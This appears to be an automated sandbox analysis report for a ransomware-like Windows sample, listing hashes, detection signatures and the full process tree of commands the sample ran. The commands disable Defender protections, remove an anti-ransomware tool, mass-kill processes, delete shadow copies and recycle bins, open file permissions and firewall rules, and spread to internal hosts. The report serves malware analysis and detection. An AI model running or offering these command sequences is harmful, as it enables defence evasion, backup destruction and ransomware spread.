Analysis

  • max time kernel
    19s
  • max time network
    150s
  • platform
    windows10_x64
  • resource
    win10v20210410
  • submitted
    28-05-2021 09:57

General

  • Target

    1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe

  • Size

    367KB

  • MD5

    b31f6216e6bc5a6291a0b82de0377553

  • SHA1

    0afdc5359268f7e78a0ca3c3c67752edd304a742

  • SHA256

    1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb

  • SHA512

    7044cae1da196e1997fd21cbac41ff0d8e7dd5da6ebcf14e4ecd26ff53f65936430c009e473c17a2eecabbc5645e2d1fb32c5ef8ab036d045b5941a52e2982f6

Malware Config

Signatures

  • Modifies Windows Defender Real-time Protection settings 3 TTPs
  • Disables Task Manager via registry modification
  • Downloads MZ/PE file
  • Modifies Windows Firewall 1 TTPs
  • Modifies file permissions 1 TTPs 64 IoCs
  • Launches sc.exe

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Kills process with taskkill 64 IoCs
  • Modifies registry key 1 TTPs 2 IoCs
  • Runs ping.exe 1 TTPs 6 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 38 IoCs
  • Suspicious use of WriteProcessMemory 30 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe
    "C:\Users\Admin\AppData\Local\Temp\1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe"
    1⤵
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:3368
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -EnableControlledFolderAccess Disabled
      2⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:2996
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell" Get-MpPreference -verbose
      2⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:1424
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableArchiveScanning $true
      2⤵
        PID:2616
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableBlockAtFirstSeen $true
        2⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:3940
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableIOAVProtection $true
        2⤵
          PID:2628
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisablePrivacyMode $true
          2⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:3012
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableScriptScanning $true
          2⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:3996
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -LowThreatDefaultAction 6
          2⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:2648
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -HighThreatDefaultAction 6 -Force
          2⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:2928
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -MAPSReporting 0
          2⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:4104
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ModerateThreatDefaultAction 6
          2⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:4228
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SevereThreatDefaultAction 6
          2⤵
            PID:4304
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SignatureDisableUpdateOnStartupWithoutEngine $true
            2⤵
              PID:4396
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SubmitSamplesConsent 2
              2⤵
              • Suspicious use of AdjustPrivilegeToken
              PID:4520
            • C:\Windows\SYSTEM32\taskkill.exe
              "taskkill" /F /IM RaccineSettings.exe
              2⤵
              • Kills process with taskkill
              PID:4632
            • C:\Windows\SYSTEM32\reg.exe
              "reg" delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Raccine Tray" /F
              2⤵
                PID:5020
              • C:\Windows\SYSTEM32\reg.exe
                "reg" delete HKCU\Software\Raccine /F
                2⤵
                • Modifies registry key
                PID:1584
              • C:\Windows\SYSTEM32\schtasks.exe
                "schtasks" /DELETE /TN "Raccine Rules Updater" /F
                2⤵
                  PID:4280
                • C:\Windows\SYSTEM32\sc.exe
                  "sc.exe" config Dnscache start= auto
                  2⤵
                    PID:4736
                  • C:\Windows\SYSTEM32\sc.exe
                    "sc.exe" config SQLTELEMETRY start= disabled
                    2⤵
                      PID:3576
                    • C:\Windows\SYSTEM32\sc.exe
                      "sc.exe" config FDResPub start= auto
                      2⤵
                        PID:1264
                      • C:\Windows\SYSTEM32\netsh.exe
                        "netsh" advfirewall firewall set rule group=\"Network Discovery\" new enable=Yes
                        2⤵
                          PID:4872
                        • C:\Windows\SYSTEM32\sc.exe
                          "sc.exe" config SSDPSRV start= auto
                          2⤵
                            PID:4112
                          • C:\Windows\SYSTEM32\sc.exe
                            "sc.exe" config SQLTELEMETRY$ECWDB2 start= disabled
                            2⤵
                              PID:4192
                            • C:\Windows\SYSTEM32\sc.exe
                              "sc.exe" config SstpSvc start= disabled
                              2⤵
                                PID:4568
                              • C:\Windows\SYSTEM32\sc.exe
                                "sc.exe" config upnphost start= auto
                                2⤵
                                  PID:4860
                                • C:\Windows\SYSTEM32\sc.exe
                                  "sc.exe" config SQLWriter start= disabled
                                  2⤵
                                    PID:4868
                                  • C:\Windows\SYSTEM32\taskkill.exe
                                    "taskkill.exe" /IM mspub.exe /F
                                    2⤵
                                    • Kills process with taskkill
                                    PID:2848
                                  • C:\Windows\SYSTEM32\taskkill.exe
                                    "taskkill.exe" /IM synctime.exe /F
                                    2⤵
                                      PID:4732
                                    • C:\Windows\SYSTEM32\taskkill.exe
                                      "taskkill.exe" /IM mspub.exe /F
                                      2⤵
                                      • Kills process with taskkill
                                      PID:2620
                                    • C:\Windows\SYSTEM32\taskkill.exe
                                      "taskkill.exe" /IM mydesktopqos.exe /F
                                      2⤵
                                        PID:4552
                                      • C:\Windows\SYSTEM32\taskkill.exe
                                        "taskkill.exe" /IM Ntrtscan.exe /F
                                        2⤵
                                        • Kills process with taskkill
                                        PID:2604
                                      • C:\Windows\SYSTEM32\taskkill.exe
                                        "taskkill.exe" /IM mysqld.exe /F
                                        2⤵
                                          PID:2420
                                        • C:\Windows\SYSTEM32\taskkill.exe
                                          "taskkill.exe" /IM sqbcoreservice.exe /F
                                          2⤵
                                          • Kills process with taskkill
                                          PID:4452
                                        • C:\Windows\SYSTEM32\taskkill.exe
                                          "taskkill.exe" /IM mydesktopservice.exe /F
                                          2⤵
                                          • Kills process with taskkill
                                          PID:3364
                                        • C:\Windows\SYSTEM32\netsh.exe
                                          "netsh" advfirewall firewall set rule group=\"File and Printer Sharing\" new enable=Yes
                                          2⤵
                                            PID:5052
                                          • C:\Windows\SYSTEM32\taskkill.exe
                                            "taskkill.exe" /IM isqlplussvc.exe /F
                                            2⤵
                                            • Kills process with taskkill
                                            PID:4544
                                          • C:\Windows\SYSTEM32\taskkill.exe
                                            "taskkill.exe" /IM firefoxconfig.exe /F
                                            2⤵
                                            • Kills process with taskkill
                                            PID:1596
                                          • C:\Windows\SYSTEM32\taskkill.exe
                                            "taskkill.exe" /IM agntsvc.exe /F
                                            2⤵
                                              PID:4412
                                            • C:\Windows\SYSTEM32\taskkill.exe
                                              "taskkill.exe" /IM steam.exe /F
                                              2⤵
                                                PID:4992
                                              • C:\Windows\SYSTEM32\arp.exe
                                                "arp" -a
                                                2⤵
                                                  PID:4312
                                                • C:\Windows\SYSTEM32\taskkill.exe
                                                  "taskkill.exe" /IM onenote.exe /F
                                                  2⤵
                                                    PID:4988
                                                  • C:\Windows\SYSTEM32\taskkill.exe
                                                    "taskkill.exe" /IM sqlwriter.exe /F
                                                    2⤵
                                                    • Kills process with taskkill
                                                    PID:1616
                                                  • C:\Windows\SYSTEM32\taskkill.exe
                                                    "taskkill.exe" /IM thebat.exe /F
                                                    2⤵
                                                    • Kills process with taskkill
                                                    PID:4908
                                                  • C:\Windows\SYSTEM32\taskkill.exe
                                                    "taskkill.exe" /IM encsvc.exe /F
                                                    2⤵
                                                    • Kills process with taskkill
                                                    PID:4148
                                                  • C:\Windows\SYSTEM32\taskkill.exe
                                                    "taskkill.exe" /IM ocomm.exe /F
                                                    2⤵
                                                    • Kills process with taskkill
                                                    PID:4592
                                                  • C:\Windows\SYSTEM32\taskkill.exe
                                                    "taskkill.exe" /IM tbirdconfig.exe /F
                                                    2⤵
                                                      PID:764
                                                    • C:\Windows\SYSTEM32\taskkill.exe
                                                      "taskkill.exe" /IM PccNTMon.exe /F
                                                      2⤵
                                                        PID:2660
                                                      • C:\Windows\SYSTEM32\taskkill.exe
                                                        "taskkill.exe" /IM excel.exe /F
                                                        2⤵
                                                          PID:4964
                                                        • C:\Windows\SYSTEM32\taskkill.exe
                                                          "taskkill.exe" /IM msaccess.exe /F
                                                          2⤵
                                                          • Kills process with taskkill
                                                          PID:1264
                                                        • C:\Windows\SYSTEM32\taskkill.exe
                                                          "taskkill.exe" /IM dbeng50.exe /F
                                                          2⤵
                                                          • Kills process with taskkill
                                                          PID:4780
                                                        • C:\Windows\SYSTEM32\taskkill.exe
                                                          "taskkill.exe" /IM infopath.exe /F
                                                          2⤵
                                                          • Kills process with taskkill
                                                          PID:3524
                                                        • C:\Windows\SYSTEM32\taskkill.exe
                                                          "taskkill.exe" /IM CNTAoSMgr.exe /F
                                                          2⤵
                                                            PID:2584
                                                          • C:\Windows\SYSTEM32\taskkill.exe
                                                            "taskkill.exe" /IM outlook.exe /F
                                                            2⤵
                                                              PID:5036
                                                            • C:\Windows\SYSTEM32\taskkill.exe
                                                              "taskkill.exe" /IM mbamtray.exe /F
                                                              2⤵
                                                              • Kills process with taskkill
                                                              PID:3312
                                                            • C:\Windows\SYSTEM32\taskkill.exe
                                                              "taskkill.exe" /IM thebat64.exe /F
                                                              2⤵
                                                              • Kills process with taskkill
                                                              PID:5052
                                                            • C:\Windows\SYSTEM32\taskkill.exe
                                                              "taskkill.exe" IM thunderbird.exe /F
                                                              2⤵
                                                                PID:4632
                                                              • C:\Windows\SYSTEM32\taskkill.exe
                                                                "taskkill.exe" /IM zoolz.exe /F
                                                                2⤵
                                                                • Kills process with taskkill
                                                                PID:4252
                                                              • C:\Windows\SYSTEM32\taskkill.exe
                                                                "taskkill.exe" /IM tmlisten.exe /F
                                                                2⤵
                                                                • Kills process with taskkill
                                                                PID:2420
                                                              • C:\Windows\SYSTEM32\taskkill.exe
                                                                "taskkill.exe" /IM dbsnmp.exe /F
                                                                2⤵
                                                                  PID:4668
                                                                • C:\Windows\SYSTEM32\taskkill.exe
                                                                  "taskkill.exe" /IM wordpad.exe /F
                                                                  2⤵
                                                                  • Kills process with taskkill
                                                                  PID:4020
                                                                • C:\Windows\SYSTEM32\taskkill.exe
                                                                  "taskkill.exe" /IM xfssvccon.exe /F
                                                                  2⤵
                                                                  • Kills process with taskkill
                                                                  PID:2500
                                                                • C:\Windows\SYSTEM32\taskkill.exe
                                                                  "taskkill.exe" /IM msftesql.exe /F
                                                                  2⤵
                                                                    PID:764
                                                                  • C:\Windows\SYSTEM32\taskkill.exe
                                                                    "taskkill.exe" /IM mysqld-opt.exe /F
                                                                    2⤵
                                                                      PID:4404
                                                                    • C:\Windows\SYSTEM32\taskkill.exe
                                                                      "taskkill.exe" /IM powerpnt.exe /F
                                                                      2⤵
                                                                      • Kills process with taskkill
                                                                      PID:2604
                                                                    • C:\Windows\SYSTEM32\taskkill.exe
                                                                      "taskkill.exe" /IM mydesktopqos.exe /F
                                                                      2⤵
                                                                      • Kills process with taskkill
                                                                      PID:4896
                                                                    • C:\Windows\SYSTEM32\taskkill.exe
                                                                      "taskkill.exe" /IM ocautoupds.exe /F
                                                                      2⤵
                                                                      • Kills process with taskkill
                                                                      PID:2212
                                                                    • C:\Windows\SYSTEM32\taskkill.exe
                                                                      "taskkill.exe" /IM ocssd.exe /F
                                                                      2⤵
                                                                      • Kills process with taskkill
                                                                      PID:4280
                                                                    • C:\Windows\SYSTEM32\taskkill.exe
                                                                      "taskkill.exe" /IM visio.exe /F
                                                                      2⤵
                                                                        PID:1928
                                                                      • C:\Windows\SYSTEM32\taskkill.exe
                                                                        "taskkill.exe" /IM oracle.exe /F
                                                                        2⤵
                                                                        • Kills process with taskkill
                                                                        PID:4736
                                                                      • C:\Windows\SYSTEM32\taskkill.exe
                                                                        "taskkill.exe" /IM mydesktopservice.exe /F
                                                                        2⤵
                                                                        • Kills process with taskkill
                                                                        PID:3788
                                                                      • C:\Windows\SYSTEM32\taskkill.exe
                                                                        "taskkill.exe" /IM winword.exe /F
                                                                        2⤵
                                                                        • Kills process with taskkill
                                                                        PID:4832
                                                                      • C:\Windows\SYSTEM32\taskkill.exe
                                                                        "taskkill.exe" /IM sqlagent.exe /F
                                                                        2⤵
                                                                          PID:4640
                                                                        • C:\Windows\SYSTEM32\taskkill.exe
                                                                          "taskkill.exe" /IM sqlbrowser.exe /F
                                                                          2⤵
                                                                          • Kills process with taskkill
                                                                          PID:4984
                                                                        • C:\Windows\SYSTEM32\taskkill.exe
                                                                          "taskkill.exe" /IM mysqld-nt.exe /F
                                                                          2⤵
                                                                            PID:2884
                                                                          • C:\Windows\SYSTEM32\taskkill.exe
                                                                            "taskkill.exe" /IM sqlservr.exe /F
                                                                            2⤵
                                                                              PID:4732
                                                                            • C:\Windows\SYSTEM32\taskkill.exe
                                                                              "taskkill.exe" /IM sql.exe /f
                                                                              2⤵
                                                                              • Kills process with taskkill
                                                                              PID:5016
                                                                            • C:\Windows\SYSTEM32\taskkill.exe
                                                                              "taskkill.exe" /IM sqld.exe /f
                                                                              2⤵
                                                                              • Kills process with taskkill
                                                                              PID:2988
                                                                            • C:\Windows\SYSTEM32\taskkill.exe
                                                                              "taskkill.exe" /IM mysql.exe /f
                                                                              2⤵
                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                              PID:2628
                                                                            • C:\Windows\SYSTEM32\taskkill.exe
                                                                              "taskkill.exe" /IM mysqld.exe /f
                                                                              2⤵
                                                                                PID:3512
                                                                              • C:\Windows\SYSTEM32\taskkill.exe
                                                                                "taskkill.exe" /IM oracle.exe /f
                                                                                2⤵
                                                                                  PID:2656
                                                                                • C:\Windows\SYSTEM32\taskkill.exe
                                                                                  "taskkill.exe" /IM vmwp.exe /f
                                                                                  2⤵
                                                                                    PID:4208
                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    "powershell.exe" & Get-WmiObject Win32_Shadowcopy | ForEach-Object { $_Delete(); }
                                                                                    2⤵
                                                                                      PID:4604
                                                                                    • C:\Windows\SYSTEM32\icacls.exe
                                                                                      "icacls" "C:*" /grant Everyone:F /T /C /Q
                                                                                      2⤵
                                                                                      • Modifies file permissions
                                                                                      PID:4488
                                                                                    • C:\Windows\SYSTEM32\icacls.exe
                                                                                      "icacls" "D:*" /grant Everyone:F /T /C /Q
                                                                                      2⤵
                                                                                      • Modifies file permissions
                                                                                      PID:4128
                                                                                    • C:\Windows\SYSTEM32\icacls.exe
                                                                                      "icacls" "Z:*" /grant Everyone:F /T /C /Q
                                                                                      2⤵
                                                                                      • Modifies file permissions
                                                                                      PID:904
                                                                                    • C:\Windows\SYSTEM32\cmd.exe
                                                                                      "cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\tmpCBA2.bat
                                                                                      2⤵
                                                                                        PID:4476
                                                                                        • C:\Windows\system32\mountvol.exe
                                                                                          mountvol
                                                                                          3⤵
                                                                                            PID:4156
                                                                                          • C:\Windows\system32\find.exe
                                                                                            find "}\"
                                                                                            3⤵
                                                                                              PID:3120
                                                                                            • C:\Windows\system32\mountvol.exe
                                                                                              mountvol !freedrive!: \\?\Volume{266d1ca4-0000-0000-0000-500600000000}\
                                                                                              3⤵
                                                                                                PID:4168
                                                                                              • C:\Windows\system32\PING.EXE
                                                                                                ping -n 2 127.0.0.1
                                                                                                3⤵
                                                                                                • Runs ping.exe
                                                                                                PID:4132
                                                                                              • C:\Windows\system32\mountvol.exe
                                                                                                mountvol !freedrive!: \\?\Volume{266d1ca4-0000-0000-0000-100000000000}\
                                                                                                3⤵
                                                                                                  PID:4264
                                                                                                • C:\Windows\system32\PING.EXE
                                                                                                  ping -n 2 127.0.0.1
                                                                                                  3⤵
                                                                                                  • Runs ping.exe
                                                                                                  PID:4152
                                                                                                • C:\Windows\system32\mountvol.exe
                                                                                                  mountvol !freedrive!: \\?\Volume{63e50be4-9a0d-11eb-a110-806e6f6e6963}\
                                                                                                  3⤵
                                                                                                    PID:2504
                                                                                                  • C:\Windows\system32\PING.EXE
                                                                                                    ping -n 2 127.0.0.1
                                                                                                    3⤵
                                                                                                    • Runs ping.exe
                                                                                                    PID:3752
                                                                                                • C:\Windows\SYSTEM32\cmd.exe
                                                                                                  "cmd.exe" /c rd /s /q %SYSTEMDRIVE%\\$Recycle.bin
                                                                                                  2⤵
                                                                                                    PID:4876
                                                                                                  • C:\Windows\SYSTEM32\cmd.exe
                                                                                                    "cmd.exe" /c rd /s /q D:\\$Recycle.bin
                                                                                                    2⤵
                                                                                                      PID:4516
                                                                                                    • C:\Windows\SYSTEM32\netsh.exe
                                                                                                      "netsh" advfirewall firewall set rule group=\"Network Discovery\" new enable=Yes
                                                                                                      2⤵
                                                                                                        PID:4064
                                                                                                      • C:\Windows\SYSTEM32\netsh.exe
                                                                                                        "netsh" advfirewall firewall set rule group="File and Printer Sharing" new enable=Yes
                                                                                                        2⤵
                                                                                                          PID:4000
                                                                                                        • C:\Windows\SYSTEM32\netsh.exe
                                                                                                          "netsh" advfirewall firewall set rule group=\"Network Discovery\" new enable=Yes
                                                                                                          2⤵
                                                                                                            PID:4668
                                                                                                          • C:\Windows\SYSTEM32\netsh.exe
                                                                                                            "netsh" advfirewall firewall set rule group=\"File and Printer Sharing\" new enable=Yes
                                                                                                            2⤵
                                                                                                              PID:4800
                                                                                                            • C:\Windows\SYSTEM32\arp.exe
                                                                                                              "arp" -a
                                                                                                              2⤵
                                                                                                                PID:4276
                                                                                                              • C:\Windows\SYSTEM32\icacls.exe
                                                                                                                "icacls.exe" C:\$RmMetadata\$TxfLog\$TxfLogContainer00000000000000000001 /grant Everyone:F /T /C /Q
                                                                                                                2⤵
                                                                                                                • Modifies file permissions
                                                                                                                PID:1072
                                                                                                              • C:\Windows\SYSTEM32\icacls.exe
                                                                                                                "icacls.exe" C:\Users\Admin\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\MANIFEST-000001 /grant Everyone:F /T /C /Q
                                                                                                                2⤵
                                                                                                                • Modifies file permissions
                                                                                                                PID:3800
                                                                                                              • C:\Windows\SYSTEM32\icacls.exe
                                                                                                                "icacls.exe" C:\Users\Admin\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Cache\data_0 /grant Everyone:F /T /C /Q
                                                                                                                2⤵
                                                                                                                • Modifies file permissions
                                                                                                                PID:2624
                                                                                                              • C:\Windows\SYSTEM32\icacls.exe
                                                                                                                "icacls.exe" C:\vcredist2010_x64.log-MSI_vc_red.msi.txt /grant Everyone:F /T /C /Q
                                                                                                                2⤵
                                                                                                                • Modifies file permissions
                                                                                                                PID:1596
                                                                                                              • C:\Users\Admin\AppData\Local\Temp\5wzwhgdn.exe
                                                                                                                "C:\Users\Admin\AppData\Local\Temp\5wzwhgdn.exe" \\10.10.0.33 -d -f -h -s -n 5 -c "C:\Users\Admin\AppData\Local\Temp\1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe"
                                                                                                                2⤵
                                                                                                                  PID:2104
                                                                                                                • C:\Users\Admin\AppData\Local\Temp\5wzwhgdn.exe
                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\5wzwhgdn.exe" \\10.10.0.41 -d -f -h -s -n 5 -c "C:\Users\Admin\AppData\Local\Temp\1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe"
                                                                                                                  2⤵
                                                                                                                    PID:1116
                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\5wzwhgdn.exe
                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\5wzwhgdn.exe" \\10.10.0.16 -d -f -h -s -n 5 -c "C:\Users\Admin\AppData\Local\Temp\1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe"
                                                                                                                    2⤵
                                                                                                                      PID:5084
                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\5wzwhgdn.exe
                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\5wzwhgdn.exe" \\10.10.0.14 -d -f -h -s -n 5 -c "C:\Users\Admin\AppData\Local\Temp\1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe"
                                                                                                                      2⤵
                                                                                                                        PID:4892
                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\5wzwhgdn.exe
                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\5wzwhgdn.exe" \\10.10.0.18 -d -f -h -s -n 5 -c "C:\Users\Admin\AppData\Local\Temp\1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe"
                                                                                                                        2⤵
                                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                                        PID:4396
                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\5wzwhgdn.exe
                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\5wzwhgdn.exe" \\10.10.0.15 -d -f -h -s -n 5 -c "C:\Users\Admin\AppData\Local\Temp\1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe"
                                                                                                                        2⤵
                                                                                                                          PID:4440
                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\5wzwhgdn.exe
                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\5wzwhgdn.exe" \\10.10.0.27 -d -f -h -s -n 5 -c "C:\Users\Admin\AppData\Local\Temp\1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe"
                                                                                                                          2⤵
                                                                                                                            PID:4844
                                                                                                                          • C:\Windows\SYSTEM32\icacls.exe
                                                                                                                            "icacls.exe" C:\vcredist2010_x64.log.html /grant Everyone:F /T /C /Q
                                                                                                                            2⤵
                                                                                                                            • Modifies file permissions
                                                                                                                            PID:5768
                                                                                                                          • C:\Windows\SYSTEM32\icacls.exe
                                                                                                                            "icacls.exe" C:\vcredist2012_x64_0_vcRuntimeMinimum_x64.log /grant Everyone:F /T /C /Q
                                                                                                                            2⤵
                                                                                                                            • Modifies file permissions
                                                                                                                            PID:4384
                                                                                                                          • C:\Windows\SYSTEM32\icacls.exe
                                                                                                                            "icacls.exe" C:\vcredist2012_x64_1_vcRuntimeAdditional_x64.log /grant Everyone:F /T /C /Q
                                                                                                                            2⤵
                                                                                                                            • Modifies file permissions
                                                                                                                            PID:5936
                                                                                                                          • C:\Windows\SYSTEM32\icacls.exe
                                                                                                                            "icacls.exe" C:\Users\Public\Libraries\RecordedTV.library-ms /grant Everyone:F /T /C /Q
                                                                                                                            2⤵
                                                                                                                            • Modifies file permissions
                                                                                                                            PID:5384
                                                                                                                          • C:\Windows\SYSTEM32\icacls.exe
                                                                                                                            "icacls.exe" C:\Users\All Users\regid.1991-06.com.microsoft\regid.1991-06.com.microsoft Office 16 Click-to-Run Extensibility Component.swidtag /grant Everyone:F /T /C /Q
                                                                                                                            2⤵
                                                                                                                            • Modifies file permissions
                                                                                                                            PID:5816
                                                                                                                          • C:\Windows\SYSTEM32\icacls.exe
                                                                                                                            "icacls.exe" C:\Users\All Users\regid.1991-06.com.microsoft\regid.1991-06.com.microsoft Office 16 Click-to-Run Licensing Component.swidtag /grant Everyone:F /T /C /Q
                                                                                                                            2⤵
                                                                                                                            • Modifies file permissions
                                                                                                                            PID:5956
                                                                                                                          • C:\Windows\SYSTEM32\icacls.exe
                                                                                                                            "icacls.exe" C:\Users\All Users\regid.1991-06.com.microsoft\regid.1991-06.com.microsoft Office 16 Click-to-Run Localization Component.swidtag /grant Everyone:F /T /C /Q
                                                                                                                            2⤵
                                                                                                                            • Modifies file permissions
                                                                                                                            PID:5664
                                                                                                                          • C:\Windows\SYSTEM32\icacls.exe
                                                                                                                            "icacls.exe" C:\Users\All Users\regid.1991-06.com.microsoft\regid.1991-06.com.microsoft_Windows-10-Pro.swidtag /grant Everyone:F /T /C /Q
                                                                                                                            2⤵
                                                                                                                            • Modifies file permissions
                                                                                                                            PID:5584
                                                                                                                          • C:\Windows\SYSTEM32\icacls.exe
                                                                                                                            "icacls.exe" C:\Users\All Users\Package Cache\{F7CAC7DF-3524-4C2D-A7DB-E16140A3D5E6}v14.21.27702\packages\vcRuntimeMinimum_amd64\cab1.cab /grant Everyone:F /T /C /Q
                                                                                                                            2⤵
                                                                                                                            • Modifies file permissions
                                                                                                                            PID:5864
                                                                                                                          • C:\Windows\SYSTEM32\icacls.exe
                                                                                                                            "icacls.exe" C:\Users\All Users\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\state.rsm /grant Everyone:F /T /C /Q
                                                                                                                            2⤵
                                                                                                                            • Modifies file permissions
                                                                                                                            PID:5224
                                                                                                                          • C:\Windows\SYSTEM32\icacls.exe
                                                                                                                            "icacls.exe" C:\Users\All Users\Package Cache\{ef6b00ec-13e1-4c25-9064-b2f383cb8412}\state.rsm /grant Everyone:F /T /C /Q
                                                                                                                            2⤵
                                                                                                                            • Modifies file permissions
                                                                                                                            PID:4380
                                                                                                                          • C:\Windows\SYSTEM32\icacls.exe
                                                                                                                            "icacls.exe" C:\Users\All Users\Package Cache\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\packages\vcRuntimeMinimum_amd64\cab1.cab /grant Everyone:F /T /C /Q
                                                                                                                            2⤵
                                                                                                                            • Modifies file permissions
                                                                                                                            PID:5856
                                                                                                                          • C:\Windows\SYSTEM32\icacls.exe
                                                                                                                            "icacls.exe" C:\Users\All Users\Package Cache\{CB0836EC-B072-368D-82B2-D3470BF95707}v12.0.40660\packages\vcRuntimeMinimum_amd64\cab1.cab /grant Everyone:F /T /C /Q
                                                                                                                            2⤵
                                                                                                                            • Modifies file permissions
                                                                                                                            PID:2604
                                                                                                                          • C:\Windows\SYSTEM32\icacls.exe
                                                                                                                            "icacls.exe" C:\Users\All Users\Package Cache\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\state.rsm /grant Everyone:F /T /C /Q
                                                                                                                            2⤵
                                                                                                                            • Modifies file permissions
                                                                                                                            PID:4492
                                                                                                                          • C:\Windows\SYSTEM32\icacls.exe
                                                                                                                            "icacls.exe" C:\Users\All Users\Package Cache\{5740BD44-B58D-321A-AFC0-6D3D4556DD6C}v12.0.40660\packages\vcRuntimeAdditional_amd64\cab1.cab /grant Everyone:F /T /C /Q
                                                                                                                            2⤵
                                                                                                                            • Modifies file permissions
                                                                                                                            PID:4436
                                                                                                                          • C:\Windows\SYSTEM32\icacls.exe
                                                                                                                            "icacls.exe" C:\Users\All Users\Package Cache\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\packages\vcRuntimeAdditional_amd64\cab1.cab /grant Everyone:F /T /C /Q
                                                                                                                            2⤵
                                                                                                                            • Modifies file permissions
                                                                                                                            PID:4884
                                                                                                                          • C:\Windows\SYSTEM32\icacls.exe
                                                                                                                            "icacls.exe" C:\Users\All Users\Package Cache\{12578975-C765-4BDF-8DDC-3284BC0E855F}v14.21.27702\packages\vcRuntimeAdditional_amd64\cab1.cab /grant Everyone:F /T /C /Q
                                                                                                                            2⤵
                                                                                                                            • Modifies file permissions
                                                                                                                            PID:1636
                                                                                                                          • C:\Windows\SYSTEM32\icacls.exe
                                                                                                                            "icacls.exe" C:\Users\All Users\Oracle\Java\java.settings.cfg /grant Everyone:F /T /C /Q
                                                                                                                            2⤵
                                                                                                                            • Modifies file permissions
                                                                                                                            PID:4960
                                                                                                                          • C:\Windows\SYSTEM32\icacls.exe
